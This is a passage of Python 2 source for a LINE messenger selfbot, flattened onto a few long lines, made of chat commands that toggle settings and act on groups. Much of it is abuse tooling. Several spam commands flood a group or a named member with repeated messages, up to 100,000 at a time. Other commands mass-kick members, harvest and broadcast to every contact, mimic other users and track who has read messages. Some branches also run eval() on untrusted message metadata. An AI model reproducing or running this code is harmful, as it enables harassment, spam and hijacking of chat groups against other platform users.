cl.sendText(msg.to,"Protection Cancel already Off") elif "Grup cancel:" in msg.text: try: strnum = msg.text.replace("Grup cancel:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan") else: cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara 
otomatis") else: cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation") except: if wait["lang"] == "JP": cl.sendText(msg.to,"Nilai tidak benar") else: cl.sendText(msg.to,"Weird value") elif msg.text.lower() == 'autoleave on': if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") elif msg.text.lower() == 'autoleave off': if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") elif msg.text.lower() == 'share on': if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") elif msg.text.lower() == 'share off': if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") elif msg.text.lower() == 'status': md = "" if wait["contact"] == True: md+="Contact:on 􀜁􀄯􏿿\n" else: md+="Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="Auto Join:on 􀜁􀄯􏿿\n" else: md +="Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="Auto leave:on 􀜁􀄯􏿿\n" else: md+="Auto 
leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="Share:on 􀜁􀄯􏿿\n" else:md+="Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="Auto add:on 􀜁􀄯􏿿\n" else:md+="Auto add:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="Protect:on 􀜁􀄯􏿿\n" else:md+="Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="Link Protect:on 􀜁􀄯􏿿\n" else:md+="Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="Invitation Protect:on 􀜁􀄯􏿿\n" else:md+="Invitation Protect:off 􀜁􀄰􏿿\n" if wait["cancelprotect"] == True: md+="Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif cms(msg.text,["creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"} cl.sendMessage(msg) kk.sendMessage(msg) elif msg.text.lower() == 'autoadd on': if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") elif msg.text.lower() == 'autoadd off': if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") elif "Pesan set:" in msg.text: wait["message"] = msg.text.replace("Pesan set:","") cl.sendText(msg.to,"We changed the message") elif msg.text.lower() == 'pesan cek': if wait["lang"] == "JP": cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) else: cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) elif "Come Set:" in msg.text: c = msg.text.replace("Come Set:","") if c in [""," ","\n",None]: 
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah") else: wait["comment"] = c cl.sendText(msg.to,"Ini telah diubah\n\n" + c) elif msg.text in ["Com on","Com:on","Comment on"]: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Aku berada di") else: cl.sendText(msg.to,"To open") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Comment Actived") else: cl.sendText(msg.to,"Comment Has Been Active") elif msg.text in ["Come off"]: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Hal ini sudah off") else: cl.sendText(msg.to,"It is already turned off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off") else: cl.sendText(msg.to,"To turn off") elif msg.text in ["Com","Comment"]: cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"])) elif msg.text in ["Com Bl"]: wait["wblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist") elif msg.text in ["Com hapus Bl"]: wait["dblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist") elif msg.text in ["Com Bl cek"]: if wait["commentBlack"] == {}: cl.sendText(msg.to,"Nothing in the blacklist") else: cl.sendText(msg.to,"The following is a blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "・" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text.lower() == 'jam on': if wait["clock"] == True: cl.sendText(msg.to,"Jam already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Jam set on") elif msg.text.lower() == 'jam off': if wait["clock"] == False: cl.sendText(msg.to,"Jam already off") else: wait["clock"] = False cl.sendText(msg.to,"Jam set off") elif "Jam say:" in msg.text: n = 
msg.text.replace("Jam say:","") if len(n.decode("utf-8")) > 30: cl.sendText(msg.to,"terlalu lama") else: wait["cName"] = n cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n) elif msg.text.lower() == 'update': if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Diperbarui") else: cl.sendText(msg.to,"Silahkan Aktifkan Jam") elif "Image " in msg.text: search = msg.text.replace("Image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass #========================== FOR COMMAND BOT FINISHED =============================# elif "Spam change:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam change:","") cl.sendText(msg.to,"spam changed") elif "Spam add:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam add:","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam:" in msg.text: if msg.toType == 2: strnum = msg.text.replace("Spam:","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) #===================================== elif "Spam " in msg.text: if msg.toType == 2: bctxt = msg.text.replace("Spam ", "") t = cl.getAllContactIds() t = 500 while(t): cl.sendText(msg.to, (bctxt)) t-=1 #============================================== elif "Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") 
cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") 
cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(msg.to, "Done") print " Spammed !" 
#==============================================================================# elif msg.text in ["Invite"]: wait["invite"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Steal contact"]: wait["contact"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama print "[Command]Like executed" cl.sendText(msg.to,"Like Status Owner") try: likeme() except: pass elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman print "[Command]Like executed" cl.sendText(msg.to,"Like Status Teman") try: likefriend() except: pass elif msg.text in ["Like:on","Like on"]: if wait["likeOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: wait["likeOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Already") elif msg.text in ["Like off","Like:off"]: if wait["likeOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: wait["likeOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Already") elif msg.text in ["Simisimi on","Simisimi:on"]: settings["simiSimi"][msg.to] = True cl.sendText(msg.to,"Simi mode On") elif msg.text in ["Simisimi off","Simisimi:off"]: settings["simiSimi"][msg.to] = False cl.sendText(msg.to,"Simi mode Off") elif msg.text in ["Autoread on","Read:on"]: wait['alwayRead'] = True cl.sendText(msg.to,"Auto read On") elif msg.text in ["Autoread off","Read:off"]: wait['alwayRead'] = False cl.sendText(msg.to,"Auto read Off") elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]: wait["detectMention"] = True cl.sendText(msg.to,"Auto respon tag On") elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]: wait["detectMention"] = False cl.sendText(msg.to,"Auto respon tag Off") elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]: wait["kickMention"] = True cl.sendText(msg.to,"Auto Kick tag ON") elif msg.text in ["Kicktag off","Autokick:off","Responkick 
off","Responkick:off"]: wait["kickMention"] = False cl.sendText(msg.to,"Auto Kick tag OFF") elif "Time" in msg.text: if msg.toType == 2: cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S')) #==============================================================================# elif "Clearall" in msg.text: if msg.toType == 2: if msg.toType == 2: print "ok" _name = msg.text.replace("Clearall","") gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) cl.sendText(msg.to,"Group Cleared.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Not found.") cl.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[cl,cl,cl] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: cl.sendText(msg.to,"Group cleanse") cl.sendText(msg.to,"Group cleanse") elif ("Kick " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif ("Ulti " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) cl.cancelGroupInvitation(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif "Kick: " in msg.text: midd = msg.text.replace("Kick: ","") cl.kickoutFromGroup(msg.to,[midd]) elif 'invite ' in msg.text.lower(): key = msg.text[-33:] cl.findAndAddContactsByMid(key) cl.inviteIntoGroup(msg.to, [key]) contact = cl.getContact(key) elif msg.text.lower() == 'cancel': if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: gInviMids = [contact.mid for contact in group.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": 
cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") elif msg.text.lower() == 'link on': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = False cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL open") else: cl.sendText(msg.to,"URL open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text.lower() == 'link off': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = True cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL close") else: cl.sendText(msg.to,"URL close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text in ["Url","Gurl"]: if msg.toType == 2: g = cl.getGroup(msg.to) if g.preventJoinByTicket == True: g.preventJoinByTicket = False cl.updateGroup(g) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) elif "Gcreator" == msg.text: try: group = cl.getGroup(msg.to) GS = group.creator.mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': GS} cl.sendMessage(M) except: W = group.members[0].mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': W} cl.sendMessage(M) cl.sendText(msg.to,"Creator Grup") elif msg.text.lower() == 'invite:gcreator': if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gcmid = ginfo.creator.mid except: gcmid = "Error" if wait["lang"] == "JP": cl.inviteIntoGroup(msg.to,[gcmid]) else: cl.inviteIntoGroup(msg.to,[gcmid]) elif ("Gname: " in msg.text): if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gname: ","") cl.updateGroup(X) elif msg.text.lower() == 'infogrup': group = 
cl.getGroup(msg.to) try: gCreator = group.creator.displayName except: gCreator = "Error" md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) elif msg.text.lower() == 'grup id': gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) #==============================================================================# elif msg.text in ["Glist"]: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "%s\n" % (cl.getGroup(i).name +" ? 
["+str(len(cl.getGroup(i).members))+"]") cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]") elif msg.text.lower() == 'gcancel': gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"Aku menolak semua undangan") else: cl.sendText(msg.to,"He declined all invitations") elif "Auto add" in msg.text: thisgroup = cl.getGroups([msg.to]) Mids = [contact.mid for contact in thisgroup[0].members] mi_d = Mids[:33] cl.findAndAddContactsByMids(mi_d) cl.sendText(msg.to,"Berhasil add semua") elif "@bye" in msg.text: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: cl.leaveGroup(msg.to) except: pass #==============================================================================# elif "mention" == msg.text.lower(): group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama) if jml <= 100: summon(msg.to, nama) if jml > 100 and jml < 200: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, len(nama)-1): nm2 += [nama[j]] summon(msg.to, nm2) if jml > 200 and jml < 500: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, 199): nm2 += [nama[j]] summon(msg.to, nm2) for k in range(200, 299): nm3 += [nama[k]] summon(msg.to, nm3) for l in range(300, 399): nm4 += [nama[l]] summon(msg.to, nm4) for m in range(400, len(nama)-1): nm5 += [nama[m]] summon(msg.to, nm5) if jml > 500: print "Terlalu Banyak Men 500+" cnt = Message() cnt.text = "Jumlah:\n" + str(jml) + " Members" cnt.to = msg.to cl.sendMessage(cnt) elif "setpoint on" == msg.text.lower(): if msg.to in wait2['readPoint']: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with 
open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to,"Setpoint already on") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S')) print wait2 elif "setpoint off" == msg.text.lower(): if msg.to not in wait2['readPoint']: cl.sendText(msg.to,"Setpoint already off") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S')) elif "viewlastseen" == msg.text.lower(): if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: cl.sendText(msg.to, "Reader:\nNone") else: chiya = [] for rom in wait2["ROM"][msg.to].items(): chiya.append(rom[1]) cmem = cl.getContacts(chiya) zx = "" zxc = "" zx2 = [] xpesan = '' for x in range(len(cmem)): xname = str(cmem[x].displayName) pesan = '' pesan2 = pesan+"@a\n" xlen = str(len(zxc)+len(xpesan)) xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1) zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid} zx2.append(zx) zxc += pesan2 msg.contentType = 0 print zxc msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S')) lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')} print lol msg.contentMetadata = lol try: cl.sendMessage(msg) except Exception as error: print error pass else: cl.sendText(msg.to, "Lurking has not been set.") elif "Gbroadcast: " in msg.text: bc = msg.text.replace("Gbroadcast: ","") gid = cl.getGroupIdsJoined() for i in gid: cl.sendText(i, bc) elif "Cbroadcast: " in msg.text: bc = 
msg.text.replace("Cbroadcast: ","") gid = cl.getAllContactIds() for i in gid: cl.sendText(i, bc) elif "Spam change: " in msg.text: wait["spam"] = msg.text.replace("Spam change: ","") cl.sendText(msg.to,"spam changed") elif "Spam add: " in msg.text: wait["spam"] = msg.text.replace("Spam add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam: " in msg.text: strnum = msg.text.replace("Spam: ","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) else: pass elif "Spam" in msg.text: txt = msg.text.split(" ") jmlh = int(txt[2]) teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","") tulisan = jmlh * (teks+"\n") if txt[1] == "on": if jmlh <= 100000: for x in range(jmlh): cl.sendText(msg.to, teks) else: cl.sendText(msg.to, "Out of Range!") elif txt[1] == "off": if jmlh <= 100000: cl.sendText(msg.to, tulisan) else: cl.sendText(msg.to, "Out Of Range!") elif ("Micadd " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: mimic["target"][target] = True 
cl.sendText(msg.to,"Target ditambahkan!") break except: cl.sendText(msg.to,"Fail !") break elif ("Micdel " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: del mimic["target"][target] cl.sendText(msg.to,"Target dihapuskan!") break except: cl.sendText(msg.to,"Fail !") break elif msg.text in ["Miclist"]: if mimic["target"] == {}: cl.sendText(msg.to,"nothing") else: mc = "Target mimic user\n" for mi_d in mimic["target"]: mc += "?? "+cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif "Mimic target " in msg.text: if mimic["copy"] == True: siapa = msg.text.replace("Mimic target ","") if siapa.rstrip(' ') == "me": mimic["copy2"] = "me" cl.sendText(msg.to,"Mimic change to me") elif siapa.rstrip(' ') == "target": mimic["copy2"] = "target" cl.sendText(msg.to,"Mimic change to target") else: cl.sendText(msg.to,"I dont know") elif "Mimic " in msg.text: cmd = msg.text.replace("Mimic ","") if cmd == "on": if mimic["status"] == False: mimic["status"] = True cl.sendText(msg.to,"Reply Message on") else: cl.sendText(msg.to,"Sudah on") elif cmd == "off": if mimic["status"] == True: mimic["status"] = False cl.sendText(msg.to,"Reply Message off") else: cl.sendText(msg.to,"Sudah off") elif "Setimage: " in msg.text: wait["pap"] = msg.text.replace("Setimage: ","") cl.sendText(msg.to, "Pap telah di Set") elif msg.text in ["Papimage","Papim","Pap"]: cl.sendImageWithURL(msg.to,wait["pap"]) elif "Setvideo: " in msg.text: wait["pap"] = msg.text.replace("Setvideo: ","") cl.sendText(msg.to,"Video Has Ben Set To") elif msg.text in ["Papvideo","Papvid"]: cl.sendVideoWithURL(msg.to,wait["pap"]) elif "TL:" in msg.text: if msg.toType == 2: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) 
#==============================================================================# elif msg.text.lower() == 'mymid': cl.sendText(msg.to,mid) elif "Timeline: " in msg.text: tl_text = msg.text.replace("Timeline: ","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif "Myname: " in msg.text: string = msg.text.replace("Myname: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string + "") elif "Mybio: " in msg.text: string = msg.text.replace("Mybio: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.statusMessage = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string) elif msg.text in ["Myname"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName) elif msg.text in ["Mybio"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[StatusMessage]===\n" + 